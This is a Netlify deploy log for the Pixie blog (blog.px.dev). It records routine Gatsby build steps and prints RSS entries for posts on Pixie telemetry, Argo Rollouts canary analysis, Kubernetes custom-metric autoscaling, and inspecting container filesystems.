Deploy details | Deploys | blog-px-dev

5:34:46 PM: Netlify Build

5:34:46 PM: ────────────────────────────────────────────────────────────────

5:34:46 PM:

5:34:46 PM: ❯ Version

5:34:46 PM: @netlify/build 29.53.0

5:34:46 PM:

5:34:46 PM: ❯ Flags

5:34:46 PM: accountId: 6155ef68a7539e6e27e54f4f

5:34:46 PM: baseRelDir: true

5:34:46 PM: buildId: 66bb98fa5ab96f0008b0e5ad

5:34:46 PM: deployId: 66bb98fa5ab96f0008b0e5af

5:34:46 PM:

5:34:46 PM: ❯ Current directory

5:34:46 PM: /opt/build/repo

5:34:46 PM:

5:34:46 PM: ❯ Config file

5:34:46 PM: /opt/build/repo/netlify.toml

5:34:46 PM:

5:34:46 PM: ❯ Context

5:34:46 PM: deploy-preview

5:34:46 PM:

5:34:46 PM: ❯ Loading plugins

5:34:46 PM: - @netlify/plugin-gatsby@3.6.2 from Netlify app and package.json

5:34:46 PM: - @netlify/plugin-lighthouse@6.0.0 from Netlify app

5:34:46 PM:

5:34:46 PM: ❯ Outdated plugins

5:34:46 PM: - @netlify/plugin-gatsby@3.6.2: latest version is 3.8.1

5:34:46 PM: Migration guide: https://ntl.fyi/gatsby-plugin-migration

5:34:46 PM: To upgrade this plugin, please update its version in "package.json"

5:34:52 PM: Found a Gatsby cache. We’re about to go FAST. ⚡️

5:34:52 PM:

5:34:52 PM: build.command from netlify.toml

5:34:52 PM: ────────────────────────────────────────────────────────────────

5:34:52 PM:

5:34:52 PM: $ yarn install && yarn lint && gatsby build

5:34:52 PM: yarn install v1.22.10

5:34:52 PM: [1/4] Resolving packages...

5:34:52 PM: success Already up-to-date.

5:34:52 PM: $ yarn run snyk-protect

5:34:52 PM: yarn run v1.22.10

5:34:52 PM: $ snyk-protect

5:34:53 PM: Nothing to patch.

5:34:53 PM: Done in 0.66s.

5:34:53 PM: Done in 1.32s.

5:34:53 PM: yarn run v1.22.10

5:34:53 PM: $ eslint '**/*.{js,jsx,ts,tsx}' && git ls-files '**/*.tsx' '**/*.ts' '**/*.js' '**/*.jsx' '**/*.scss' '**/*.py' | xargs -n1 tools/licenses/checker.py -f

5:34:59 PM: Done in 6.30s.

5:35:03 PM: success compile gatsby files - 1.748s

5:35:03 PM: success load gatsby config - 0.039s

5:35:04 PM: success load plugins - 0.758s

5:35:04 PM: warning gatsby-plugin-react-helmet: Gatsby now has built-in support for modifying the document head. Learn more at https://gatsby.dev/gatsby-head

5:35:04 PM: success onPreInit - 0.005s

5:35:04 PM: success delete worker cache from previous builds - 0.002s

5:35:04 PM: success initialize cache - 0.027s

5:35:04 PM: success copy gatsby files - 0.110s

5:35:04 PM: success Compiling Gatsby Functions - 0.168s

5:35:04 PM: success onPreBootstrap - 0.176s

5:35:05 PM: success createSchemaCustomization - 0.067s

5:35:12 PM: success Checking for changed pages - 0.000s

5:35:12 PM: success source and transform nodes - 7.304s

5:35:13 PM: info Writing GraphQL type definitions to /opt/build/repo/.cache/schema.gql

5:35:13 PM: success building schema - 1.102s

5:35:13 PM: success createPages - 0.058s

5:35:13 PM: success createPagesStatefully - 0.055s

5:35:13 PM: info Total nodes: 761, SitePage nodes: 56 (use --verbose for breakdown)

5:35:13 PM: success Checking for changed pages - 0.000s

5:35:13 PM: success Cleaning up stale page-data - 0.002s

5:35:13 PM: success onPreExtractQueries - 0.000s

5:35:15 PM: success extract queries from components - 2.279s

5:35:15 PM: success write out redirect data - 0.002s

5:35:15 PM: success Build manifest and related icons - 0.052s

5:35:15 PM: success onPostBootstrap - 0.054s

5:35:15 PM: info bootstrap finished - 15.886s

5:35:15 PM: success write out requires - 0.002s

5:35:15 PM: warning Browserslist: caniuse-lite is outdated. Please run:

5:35:15 PM: npx update-browserslist-db@latest

5:35:15 PM: Why you should do it regularly: https://github.com/browserslist/update-db#readme

5:35:16 PM: warning [deprecated default-site-plugin] node.fs is deprecated. Please set "resolve.fallback.fs = false".

5:35:19 PM: success Building production JavaScript and CSS bundles - 3.533s

5:35:19 PM: warning [deprecated default-site-plugin] node.fs is deprecated. Please set "resolve.fallback.fs = false".

5:35:22 PM: success Building HTML renderer - 3.448s

5:35:22 PM: success Execute page configs - 0.049s

5:35:22 PM: success Caching Webpack compilations - 0.000s

5:35:30 PM: success run queries in workers - 7.382s - 56/56 7.59/s

5:35:30 PM: success Merge worker state - 0.005s

5:35:30 PM: success Writing page-data.json files to public directory - 0.011s - 1/1 93.67/s

5:35:38 PM: success Building static HTML for pages - 5.174s - 46/46 8.89/s

5:35:38 PM: info [gatsby-plugin-netlify] Creating SSR/DSG redirects...

5:35:38 PM: info [gatsby-plugin-netlify] Created 0 SSR/DSG redirects...

5:35:39 PM: success index to Algolia - 1.355s - Done!

5:35:42 PM: {

5:35:42 PM: title: 'Adam Hawkins On Pixie',

5:35:42 PM: date: '2020-06-17',

5:35:42 PM: description: 'I, Adam Hawkins , recently tried Pixie. I was\n' +

5:35:42 PM: 'instantly impressed because it solved a recurring problem for me:\n' +

5:35:42 PM: 'application code changes…',

5:35:42 PM: url: 'https://blog.px.dev/adam-hawkins-on-pixie/',

5:35:42 PM: guid: 'https://blog.px.dev/adam-hawkins-on-pixie/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>I, <a href="https://hawkins.io">Adam Hawkins</a>, recently tried Pixie. I was\n' +

5:35:42 PM: 'instantly impressed because it solved a recurring problem for me:\n' +

5:35:42 PM: 'application code changes. Let me explain.</p><p>As an SRE, I'm responsible for operations, but am often unaware of the\n' +

5:35:42 PM: 'services internals. These services\n' +

5:35:42 PM: 'are black boxes to me. If the box is an HTTP service, then that\n' +

5:35:42 PM: 'requires telemetry on incoming request counts, latencies, and\n' +

5:35:42 PM: 'response status code--bonus points for p50, p90, and p95 latencies. My\n' +

5:35:42 PM: 'problem, and I'm guessing it's common to other SRE and DevOps teams,\n' +

5:35:42 PM: 'is that these services are often improperly instrumented. Before\n' +

5:35:42 PM: 'Pixie, we would have to wait on the dev team to add the required\n' +

5:35:42 PM: 'telemetry. Truthfully, that's just toil. It would be better for\n' +

5:35:42 PM: 'SREs, DevOps engineers, and application developers to have\n' +

5:35:42 PM: 'telemetry provided automatically via infrastructure. Enter Pixie.</p><p>Pixie is the first telemetry tool I've seen that provides\n' +

5:35:42 PM: 'operational telemetry out of the box with <strong>zero</strong> changes to\n' +

5:35:42 PM: 'application code. SREs can simply run <code>px deploy</code>, start collecting\n' +

5:35:42 PM: 'data, then begin troubleshooting in minutes.</p><p>It took me a bit to grok Pixie because it's different than\n' +

5:35:42 PM: 'tools like NewRelic or DataDog that I've used in the past. Tools like\n' +

5:35:42 PM: 'these are different than Pixie becauase:</p><ul><li>They require application code changes (like adding in\n' +

5:35:42 PM: 'client library or annotating Kubernetes manifests) to gather full\n' +

5:35:42 PM: 'telemetry.</li><li>They're largely GUI driven.</li><li>Telemetry is collected then shipped off to a centralized service\n' +

5:35:42 PM: '(which drives up the cost).</li></ul><p>Pixie is radically different.</p><ul><li>First, it integrates with eBPF so it can\n' +

5:35:42 PM: 'collect data about application traffic without application code\n' +

5:35:42 PM: 'changes. Pixie provides common HTTP telemetry (think request counts,\n' +

5:35:42 PM: 'latencies, and status codes) for all services running on your\n' +

5:35:42 PM: 'Kubernetes cluster. Better yet, Pixie generates service to service\n' +

5:35:42 PM: 'telemetry, so you're given a service map right out of the box.</li><li>Second, it bakes infrastructure-as-code principles into the core DX. Every\n' +

5:35:42 PM: 'Pixie Dashboard is a program, which you can manage with version\n' +

5:35:42 PM: 'control and distribute amongst your team, or even take with to\n' +

5:35:42 PM: 'different teams. Pixie also provides a terminal interface so you can\n' +

5:35:42 PM: 'interact with the dashboards directly in the CLI. That's a first for\n' +

5:35:42 PM: 'me and I loved it! These same scripts can also run in the browser.</li><li>Third, and lastly, Pixie's data storage and pricing model is\n' +

5:35:42 PM: 'different. Pixie keeps all telemetry data on your cluster, as a result\n' +

5:35:42 PM: 'the cost is signicantly lower. It's easy to pay $XXX,XXX dollars per\n' +

5:35:42 PM: 'year for other tools. Pixie's cost promises to be orders of\n' +

5:35:42 PM: 'magnitude less.</li></ul><p>Sounds interesting right?</p><p>Check out my demo video for quick\n' +

5:35:42 PM: 'walkthrough.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/_MlD-hVjVok" frameBorder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe><p>Pixie is in free community beta right now. You can install it on your\n' +

5:35:42 PM: 'cluster and try it for yourself.</p>'

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Automate Canary Analysis on Kubernetes with Argo',

5:35:42 PM: date: '2022-02-11',

5:35:42 PM: description: 'Deploying new code to your production cluster can be stressful. No matter how well the code has been tested, there’s always a risk that an…',

5:35:42 PM: url: 'https://blog.px.dev/argo-rollouts/',

5:35:42 PM: guid: 'https://blog.px.dev/argo-rollouts/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p><strong>Deploying new code to your production cluster can be stressful.</strong> No matter how well the code has been tested, there’s always a risk that an issue won’t surface until exposed to real customer traffic. To minimize any potential impact on your customers, you’ll want to maintain tight control over the progression of your application updates.</p><p>The native Kubernetes Deployment supports <a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/#strategy">two strategies</a> for replacing old pods with new ones:</p><ul><li><code>Recreate</code>: version A is terminated then version B is rolled out. Results in downtime between shutdown and reboot of the application.</li><li><code>RollingUpdate</code> (default): version B is slowly rolled out replacing version A.</li></ul><p>Unfortunately, neither provides much control. Once a <code>RollingUpdate</code> is in progress, you have little control over the speed of the rollout or the split of the traffic between version A and B. If an issue is discovered, you can halt the progression, but automated rollbacks are not supported. Due to these limitations, RollingUpdate is generally considered too risky for large scale production environments.</p><p>In this post, we’ll discuss how a canary deployment strategy can reduce risk and give you more control during application updates. We’ll walk through how to perform a canary deployment with <a href="https://argoproj.github.io/rollouts/">Argo Rollouts</a> including automated analysis of the canary pods to determine whether to promote or rollback a new application version. As an example, we’ll use <a href="https://github.com/pixie-io/pixie">Pixie</a>, an open source Kubernetes observability tool, to generate HTTP error rate for the canary pods.</p><p>The source code and instructions for this example live <a href="https://github.com/pixie-io/pixie-demos/tree/main/argo-rollouts-demo">here</a>.</p><h2>Canary Deployments</h2><p>A canary deployment involves directing a small amount of traffic to the updated version of a service that has been deployed alongside the stable production version. This strategy allows you to verify that the new code works in production before rolling out the change to the rest of your pods.</p><p>The typical flow for a canary deployment looks something like this:</p><ol><li>Run the existing stable version of the service alongside the new canary version of the service in the production K8s cluster.</li><li>Split and scale traffic between the two versions.</li><li>Analyze how the canary version is performing.</li><li>Based on the results of the canary analysis either replace the stable version with the newer canary version or rollback to the stable version.</li></ol><div class="image-m"><svg title="A canary deployment strategy reduces risk by diverting a small amount of traffic to the new version. Metrics from the canary release inform the decision to increase traffic or rollback." src="canary-deploy.png"></svg></div><p>A canary release doesn’t guarantee that you will identify all issues with your new application version. However, a carefully designed canary configuration can maximize your chance of catching an issue before the new version is fully rolled out.</p><h3>How much traffic should the canary get?</h3><p>Too little traffic can make it harder to detect problems, but too much traffic will impact more users in the event that an issue is discovered with the canary release. As a general rule, aim to direct 5-10% of your traffic to the canary release. If possible, you should time your canary deploys to overlap with your peak traffic period.</p><h3>How long should the analysis run?</h3><p>There’s no correct answer to this question, but you’re trading off better data with reduced development velocity. One strategy is to implement a short first step (e.g. 5 min) so that you can fail fast for any obvious issues, with longer steps to follow if the first step succeeds. Analysis should also be tailored per service so that critical services are monitored for longer periods of time.</p><h3>Which metrics should I analyze?</h3><p>For API based services it is common to measure the following metrics:</p><ul><li><strong>Error Rate</strong>: the percentage of 4xx+ responses</li><li><strong>Latency</strong>: the length of time between when the service receives a request and when it returns a response.</li><li><strong>Throughput</strong>: how many requests a service is handling per second</li></ul><p>However, these metrics may differ depending on the specific profile of your service.</p><h2>Why Argo Rollouts?</h2><p>You can manually perform a canary deployment <a href="https://github.com/ContainerSolutions/k8s-deployment-strategies/tree/master/canary/native#in-practice">using native Kubernetes</a>, but the benefit of using Argo Rollouts is that the controller manages these steps for you. Another advantage of Argo is that it supports traffic splitting without using a mesh provider.</p><p><a href="https://argoproj.github.io/rollouts/">Argo Rollouts</a> is a Kubernetes controller and set of CRDs, including the</p><ul><li><code>Rollout</code> resource: a drop-in replacement for the native Kubernetes Deployment resource. Contains the recipe for splitting traffic and performing analysis on the canary version.</li><li><code>AnalysisTemplate</code> resource: contains instructions on which metrics to query and defines the success criteria for the analysis.</li></ul><p>The combination of these two CRDs provide the configurability needed to give you fine grained control over the speed of the rollout, the split of the traffic between the old and new application versions, and the analysis performed on the new canary version.</p><h3>Defining the application <code>Rollout</code></h3><p>The <a href="https://argoproj.github.io/argo-rollouts/features/specification/">Rollout</a> resource defines how to perform the canary deployment.</p><p>Our <a href="https://github.com/pixie-io/pixie-demos/blob/main/argo-rollouts-demo/canary/rollout-with-analysis.yaml"><code>rollout-with-analysis</code></a> template (shown below) does the following:</p><ul><li>Runs background analysis to check the canary pod’s HTTP error rate every 30 seconds during deployment. If the error rate exceeds the value defined in the AnalysisTemplate, the Rollout should fail immediately.</li><li>At first, only 10% of application traffic is redirected to the canary. This value is scaled up to 50% in the second step. Each step has a 60 second pause to give the analysis time to gather multiple values.</li></ul><p><em>Note that this canary rollout configuration does not respect the best practices laid out in the beginning of this article. Instead, the values are chosen to allow for a quick 2 min demo.</em></p><pre><code class="language-yaml">apiVersion: argoproj.io/v1alpha1\n' +

5:35:42 PM: 'kind: Rollout\n' +

5:35:42 PM: 'metadata:\n' +

5:35:42 PM: ' name: canary-demo\n' +

5:35:42 PM: 'spec:\n' +

5:35:42 PM: ' replicas: 5\n' +

5:35:42 PM: ' revisionHistoryLimit: 1\n' +

5:35:42 PM: ' selector:\n' +

5:35:42 PM: ' matchLabels:\n' +

5:35:42 PM: ' app: canary-demo\n' +

5:35:42 PM: ' strategy:\n' +

5:35:42 PM: ' canary:\n' +

5:35:42 PM: ' analysis:\n' +

5:35:42 PM: ' templates:\n' +

5:35:42 PM: ' - templateName: http-error-rate-background\n' +

5:35:42 PM: ' args:\n' +

5:35:42 PM: ' - name: namespace\n' +

5:35:42 PM: ' value: default\n' +

5:35:42 PM: ' - name: service-name\n' +

5:35:42 PM: ' value: canary-demo\n' +

5:35:42 PM: ' - name: canary-pod-hash\n' +

5:35:42 PM: ' valueFrom:\n' +

5:35:42 PM: ' podTemplateHashValue: Latest\n' +

5:35:42 PM: ' canaryService: canary-demo-preview\n' +

5:35:42 PM: ' steps:\n' +

5:35:42 PM: ' - setWeight: 10\n' +

5:35:42 PM: ' - pause: {duration: 60s}\n' +

5:35:42 PM: ' - setWeight: 50\n' +

5:35:42 PM: ' - pause: {duration: 60s}\n' +

5:35:42 PM: '</code></pre><h3>Defining the application <code>AnalysisTemplate</code></h3><p>The <a href="https://argoproj.github.io/argo-rollouts/features/analysis/">AnalysisTemplate</a> defines how to perform the canary analysis and how to interpret if the resulting metric is acceptable.</p><p>Argo Rollouts provides several ways to perform analysis of a canary deployment:</p><ul><li>Query an observability provider (Prometheus, New Relic, etc)</li><li>Run a Kubernetes Job</li><li>Make an HTTP request to some service</li></ul><p>Querying an observability provider is the most common strategy and <a href="https://argoproj.github.io/argo-rollouts/features/analysis/">straightforward to set up</a>. We’ll take a look at one of the less documented options: we’ll spin up our own metrics server service which will return a metric in response to an HTTP request.</p><p>Our metric server will use Pixie to generate a wide range of custom metrics. However, the approach detailed below can be used for any metrics provider you have, not just Pixie.</p><p>The <a href="https://github.com/pixie-io/pixie-demos/blob/main/argo-rollouts-demo/canary/pixie-analysis.yaml"><code>http-error-rate-background</code></a> template (shown below) checks the HTTP error rate percentage every 30 seconds (after an initial 30s delay). This template is used as a fail-fast mechanism and runs throughout the rollout.</p><pre><code class="language-yaml">apiVersion: argoproj.io/v1alpha1\n' +

5:35:42 PM: 'kind: AnalysisTemplate\n' +

5:35:42 PM: 'metadata:\n' +

5:35:42 PM: ' name: http-error-rate-background\n' +

5:35:42 PM: 'spec:\n' +

5:35:42 PM: ' args:\n' +

5:35:42 PM: ' - name: service-name\n' +

5:35:42 PM: ' - name: namespace\n' +

5:35:42 PM: ' - name: canary-pod-hash\n' +

5:35:42 PM: ' metrics:\n' +

5:35:42 PM: ' - name: webmetric\n' +

5:35:42 PM: ' successCondition: result <= 0.1\n' +

5:35:42 PM: ' interval: 30s\n' +

5:35:42 PM: ' initialDelay: 30s\n' +

5:35:42 PM: ' provider:\n' +

5:35:42 PM: ' web:\n' +

5:35:42 PM: ' url: "http://px-metrics.px-metrics.svc.cluster.local/error-rate/{{args.namespace}}/{{args.service-name}}-{{args.canary-pod-hash}}"\n' +

5:35:42 PM: ' timeoutSeconds: 20\n' +

5:35:42 PM: ' jsonP'... 7265 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Horizontal Pod Autoscaling with Custom Metrics in Kubernetes',

5:35:42 PM: date: '2021-10-20',

5:35:42 PM: description: 'Sizing a Kubernetes deployment can be tricky . How many pods does this deployment need? How much CPU/memory should I allocate per pod? The…',

5:35:42 PM: url: 'https://blog.px.dev/autoscaling-custom-k8s-metric/',

5:35:42 PM: guid: 'https://blog.px.dev/autoscaling-custom-k8s-metric/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p><strong>Sizing a Kubernetes deployment can be tricky</strong>. How many pods does this deployment need? How much CPU/memory should I allocate per pod? The optimal number of pods varies over time, too, as the amount of traffic to your application changes.</p><p>In this post, we'll walk through how to autoscale your Kubernetes deployment by custom application metrics. As an example, we'll use Pixie to generate a custom metric in Kubernetes for HTTP requests/second by pod.</p><p>Pixie is a fully open source, CNCF sandbox project that can be used to generate a wide range of custom metrics. However, the approach detailed below can be used for any metrics datasource you have, not just Pixie.</p><p>The full source code for this example lives <a href="https://github.com/pixie-io/pixie-demos/tree/main/custom-k8s-metrics-demo">here</a>. If you want to go straight to autoscaling your deployments by HTTP throughput, it can be used right out of the box.</p><h2>Metrics for autoscaling</h2><p>Autoscaling allows us to automatically allocate more pods/resources when the application is under heavy load, and deallocate them when the load falls again. This helps to provide a stable level of performance in the system without wasting resources.</p><div class="image-xl"><svg title="Autoscaling the number of pods in a deployment based on deployment performance." src="autoscaling-diagram.svg"></svg></div><p><strong>The best metric to select for autoscaling depends on the application</strong>. Here is a (very incomplete) list of metrics that might be useful, depending on the context:</p><ul><li>CPU</li><li>Memory</li><li>Request throughput (HTTP, SQL, Kafka…)</li><li>Average, P90, or P99 request latency</li><li>Latency of downstream dependencies</li><li>Number of outbound connections</li><li>Latency of a specific function</li><li>Queue depth</li><li>Number of locks held</li></ul><p>Identifying and generating the right metric for your deployment isn't always easy. CPU or memory are tried and true metrics with wide applicability. They're also comparatively easier to grab than application-specific metrics (such as request throughput or latency).</p><p><strong>Capturing application-specific metrics can be a real hassle.</strong> It's a lot easier to fall back to something like CPU usage, even if it doesn't reflect the most relevant bottleneck in our application. In practice, just getting access to the right data is half the battle. Pixie can automatically collect telemetry data with <a href="https://docs.px.dev/about-pixie/pixie-ebpf/">eBPF</a> (and therefore without changes to the target application), which makes this part easier.</p><p>The other half of the battle (applying that data to the task of autoscaling) is well supported in Kubernetes!</p><h2>Autoscaling in Kubernetes</h2><p>Let's talk more about the options for autoscaling deployments in Kubernetes. Kubernetes offers two types of autoscaling for pods.</p><p><strong>Horizontal Pod Autoscaling</strong> (<a href="https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/">HPA</a>) automatically increases/decreases the <em>number</em> of pods in a deployment.</p><p><strong>Vertical Pod Autoscaling</strong> (<a href="https://github.com/kubernetes/autoscaler/tree/master/vertical-pod-autoscaler">VPA</a>) automatically increases/decreases <em>resources</em> allocated to the pods in your deployment.</p><p>Kubernetes provides built-in support for autoscaling deployments based on resource utilization. Specifically, you can autoscale your deployments by CPU or Memory with just a few lines of YAML:</p><pre><code class="language-yaml">apiVersion: autoscaling/v2beta2\n' +

5:35:42 PM: 'kind: HorizontalPodAutoscaler\n' +

5:35:42 PM: 'metadata:\n' +

5:35:42 PM: ' name: my-cpu-hpa\n' +

5:35:42 PM: 'spec:\n' +

5:35:42 PM: ' scaleTargetRef:\n' +

5:35:42 PM: ' apiVersion: apps/v1\n' +

5:35:42 PM: ' kind: Deployment\n' +

5:35:42 PM: ' name: my-deployment\n' +

5:35:42 PM: ' minReplicas: 1\n' +

5:35:42 PM: ' maxReplicas: 10\n' +

5:35:42 PM: ' metrics:\n' +

5:35:42 PM: ' - type: Resource\n' +

5:35:42 PM: ' resource:\n' +

5:35:42 PM: ' name: cpu\n' +

5:35:42 PM: ' target:\n' +

5:35:42 PM: ' type: Utilization\n' +

5:35:42 PM: ' averageUtilization: 50\n' +

5:35:42 PM: '</code></pre><p>This makes sense, because CPU and memory are two of the most common metrics to use for autoscaling. However, like most of Kubernetes, Kubernetes autoscaling is also <em>extensible</em>. Using the Kubernetes custom metrics API, <strong>you can create autoscalers that use custom metrics that you define</strong> (more on this soon).</p><p>If I've defined a custom metric, <code>my-custom-metric</code>, the YAML for the autoscaler might look like this:</p><pre><code class="language-yaml">apiVersion: autoscaling/v2beta2\n' +

5:35:42 PM: 'kind: HorizontalPodAutoscaler\n' +

5:35:42 PM: 'metadata:\n' +

5:35:42 PM: ' name: my-custom-metric-hpa\n' +

5:35:42 PM: 'spec:\n' +

5:35:42 PM: ' scaleTargetRef:\n' +

5:35:42 PM: ' apiVersion: apps/v1\n' +

5:35:42 PM: ' kind: Deployment\n' +

5:35:42 PM: ' name: my-deployment\n' +

5:35:42 PM: ' minReplicas: 1\n' +

5:35:42 PM: ' maxReplicas: 10\n' +

5:35:42 PM: ' metrics:\n' +

5:35:42 PM: ' - type: Pods\n' +

5:35:42 PM: ' pods:\n' +

5:35:42 PM: ' metric:\n' +

5:35:42 PM: ' name: my-custom-metric\n' +

5:35:42 PM: ' target:\n' +

5:35:42 PM: ' type: AverageValue\n' +

5:35:42 PM: ' averageUtilization: 20\n' +

5:35:42 PM: '</code></pre><p>How can I give the Kubernetes autoscaler access to this custom metric? We will need to implement a custom metric API server, which is covered next.</p><h2>Kubernetes Custom Metric API</h2><p>In order to autoscale deployments based on custom metrics, we have to provide Kubernetes with the ability to fetch those custom metrics from within the cluster. This is exposed to Kubernetes as an API, which you can read more about <a href="https://github.com/kubernetes/community/blob/master/contributors/design-proposals/instrumentation/custom-metrics-api.md">here</a>.</p><p>The custom metrics API in Kubernetes associates each metric with a particular resource:</p><p><code>/namespaces/example-ns/pods/example-pod/{my-custom-metric}</code>\n' +

5:35:42 PM: 'fetches <code>my-custom-metric</code> for pod <code>example-ns/example-pod</code>. </p><p>The Kubernetes custom metrics API also allows fetching metrics by selector:</p><p><code>/namespaces/example-ns/pods/*/{my-custom-metric}</code>\n' +

5:35:42 PM: 'fetches <code>my-custom-metric</code> for all of the pods in the namespace <code>example-ns</code>. </p><p><strong>In order for Kubernetes to access our custom metric, we need to create a custom metric server that is responsible for serving up the metric.</strong> Luckily, the <a href="https://github.com/kubernetes/community/tree/master/sig-instrumentation">Kubernetes Instrumentation SIG</a> created a <a href="https://github.com/kubernetes-sigs/custom-metrics-apiserver">framework</a> to make it easy to build custom metrics servers for Kubernetes.</p><div class="image-l"><svg alt="The autoscaler calls out to the custom metric server to make scale-up/scale-down decisions." src="physical-layout.svg"></svg></div><p>All that we needed to do was implement a Go server meeting the framework's interface:</p><pre><code class="language-go">type CustomMetricsProvider interface {\n' +

5:35:42 PM: ' // Fetches a single metric for a single resource.\n' +

5:35:42 PM: ' GetMetricByName(ctx context.Context, name types.NamespacedName, info CustomMetricInfo, metricSelector labels.Selector) (*custom_metrics.MetricValue, error)\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' // Fetch all metrics matching the input selector, i.e. all pods in a particular namespace.\n' +

5:35:42 PM: ' GetMetricBySelector(ctx context.Context, namespace string, selector labels.Selector, info CustomMetricInfo, metricSelector labels.Selector) (*custom_metrics.MetricValueList, error)\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' // List all available metrics.\n' +

5:35:42 PM: ' ListAllMetrics() []CustomMetricInfo\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pre><h2>Implementing a Custom Metric Server</h2><p>Our implementation of the custom metric server can be found <a href="https://github.com/pixie-io/pixie-demos/blob/main/custom-k8s-metrics-demo/pixie-http-metric-provider.go">here</a>. Here's a high-level summary of the basic approach:</p><ul><li>In <code>ListAllMetrics</code>, the custom metric server defines a custom metric, <code>px-http-requests-per-second</code>, on the Pod resource type.</li><li>The custom metric server queries Pixie's <a href="https://docs.px.dev/reference/api/overview">API</a> every 30 seconds in order to generate the metric values (HTTP requests/second, by pod).</li><li>These values can be fetched by subsequent calls to <code>GetMetricByName</code> and <code>GetMetricBySelector</code>.</li><li>The server caches the results of the query to avoid unnecessary recomputation every time a metric is fetched.</li></ul><p>The custom metrics server contains a <a href="https://github.com/pixie-io/pixie-demos/blob/main/custom-k8s-metrics-demo/pixie-http-metric-provider.go#L33-L48">hard-coded</a> PxL script (Pixie's <a href="https://docs.px.dev/reference/pxl/">query language</a>) in order to compute HTTP requests/second by pod. PxL is very flexible, so we could easily extend this script to generate other metrics instead (latency by pod, requests/second in a different protocol like SQL, function latency, etc). </p><p>It's important to generate a custom metric for every one of your pods, because the Kubernetes autoscaler will not assume a zero-value for a pod without a metric associated. One early bug our implementation had was omitting the metric for pods that didn't have any HTTP requests.</p><h2>Testing and Tuning</h2><p>We can sanity check our custom metric via the <code>kubectl</code> API:</p><pre><code class="language-bash">kubectl [-n <ns>] get --raw "/apis/custom.metrics.k8s.io/v1beta2/namespaces/default/pods/*/px-http-requests-per-second"\n' +

5:35:42 PM: '</code></pre><p>Let's try it on a demo application, a simple echo server. The echo serv'... 4318 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: "Where are my container's files? Inspecting container filesystems",

5:35:42 PM: date: '2021-11-04',

5:35:42 PM: description: 'If you work a lot with containers, then there’s a good chance you’ve wanted to look inside a running container’s filesystem at some point…',

5:35:42 PM: url: 'https://blog.px.dev/container-filesystems/',

5:35:42 PM: guid: 'https://blog.px.dev/container-filesystems/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>If you work a lot with containers, then there’s a good chance you’ve wanted to look inside a running container’s filesystem at some point. Maybe the container is failing to run properly and you want to read some logs, maybe you want to check some configuration files inside the container...or maybe you’re like me and want to place some eBPF probes on the binaries in that container (more on this later).</p><p>No matter the reason, in this post, we’ll cover a few methods you can use to inspect the files inside a container.</p><p>We’ll start with the easy and commonly recommended ways of exploring a container’s filesystem, and talk about why they don’t always work. We’ll follow that up with a basic understanding of how container filesystems are managed by the Linux kernel, and we’ll use that understanding to inspect the filesystem in different, but still easy, ways.</p><h2>Method 1: Exec into the container</h2><p>If you perform a quick search on how to inspect a container’s filesystem, a common solution you’ll find is to use the <a href="https://docs.docker.com/engine/reference/commandline/exec/">Docker command</a> (<a href="https://stackoverflow.com/questions/20813486/exploring-docker-containers-file-system">[1]</a>, <a href="https://www.baeldung.com/ops/docker-container-filesystem">[2]</a>):</p><pre><code class="language-bash">docker exec -it mycontainer /bin/bash\n' +

